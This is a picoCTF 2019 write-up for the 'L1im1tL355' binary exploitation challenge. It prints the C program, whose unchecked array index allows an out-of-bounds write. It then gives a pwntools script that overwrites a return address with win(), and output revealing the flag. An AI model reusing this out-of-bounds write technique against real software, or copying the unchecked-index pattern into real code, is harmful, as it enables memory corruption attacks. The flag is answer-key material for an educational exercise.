# L1im1tL355
Binary Exploitation, 400 points

## Description:
> Just pwn this program and get a flag.

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define FLAG_BUFFER 128

void win() {
  char buf[FLAG_BUFFER];
  FILE *f = fopen("flag.txt","r");
  fgets(buf,FLAG_BUFFER,f);
  puts(buf);
  fflush(stdout);
}

void replaceIntegerInArrayAtIndex(unsigned int *array, int index, int value) {
   array[index] = value;
}

int main(int argc, char *argv[])
{
   int index;
   int value;
   int array[666];
   puts("Input the integer value you want to put in the array\n");
   scanf("%d",&value);
   fgetc(stdin);
   puts("Input the index in which you want to put the value\n");
   scanf("%d",&index);
   replaceIntegerInArrayAtIndex(array,index,value);
   exit(0);
}


```


## Solution:

(Initial commit with just the script)

```python
# First, generate a pwntools template using:
# pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/l1im1tl355_4_b2111fe5737c985221bac06a80d6d6c7/vuln

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

import os

if shell is not None:
    shell.set_working_directory(os.path.dirname(remote_path))

io = start()

io.sendlineafter("Input the integer value you want to put in the array", str(exe.symbols["win"]))
io.sendlineafter("Input the index in which you want to put the value", str(-5))

print io.recvall()
```

Output:
```console
root@kali:/media/sf_CTFs/pico/L1im1tL355# python exploit.py
[*] '/media/sf_CTFs/pico/L1im1tL355/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Connecting to 2019shell1.picoctf.com on port 22: Done
[*] dvdalt@2019shell1.picoctf.com:
    Distro    Ubuntu 18.04
    OS:       linux
    Arch:     amd64
    Version:  4.15.0
    ASLR:     Enabled
[+] Opening new channel: 'pwd': Done
[+] Receiving all data: Done (13B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/tmp/tmp.6XNY7d0Y0s'
[+] Opening new channel: 'ln -s /home/dvdalt/* .': Done
[+] Receiving all data: Done (0B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/problems/l1im1tl355_4_b2111fe5737c985221bac06a80d6d6c7'
[+] Starting remote process '/problems/l1im1tl355_4_b2111fe5737c985221bac06a80d6d6c7/vuln' on 2019shell1.picoctf.com: pid 1343635
[+] Receiving all data: Done (34B)
[*] Stopped remote process 'vuln' on 2019shell1.picoctf.com (pid 1343635)


picoCTF{str1nG_CH3353_5243a217}
```